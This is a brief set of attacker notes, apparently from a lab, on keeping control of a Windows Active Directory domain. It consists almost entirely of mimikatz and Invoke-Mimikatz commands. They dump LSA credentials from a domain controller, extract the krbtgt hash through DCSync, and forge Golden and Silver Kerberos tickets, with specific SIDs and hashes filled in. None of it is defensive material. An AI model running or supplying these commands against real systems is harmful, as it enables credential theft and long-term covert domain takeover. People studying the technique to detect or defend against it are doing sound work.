Persistence Flow

Persistence Technique: Golden Ticket:

Execute mimikatz on DC:

mimikatz # privilege::debug mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘

On any machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt”‘

To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:SECURITY\krbtgt”‘

Persistence Technique: Silver Ticket:

Using hash of the domain controller computer account. Below command provides access to share on the DC.

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /domain::security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /target:WIN-2RUMVG5JPOC.security.local /service:cifs /rc4:62e72bcfbac429fa51d15ec57caa506d /id:500 /user:administrator /ptt”‘

@Saksham Dixit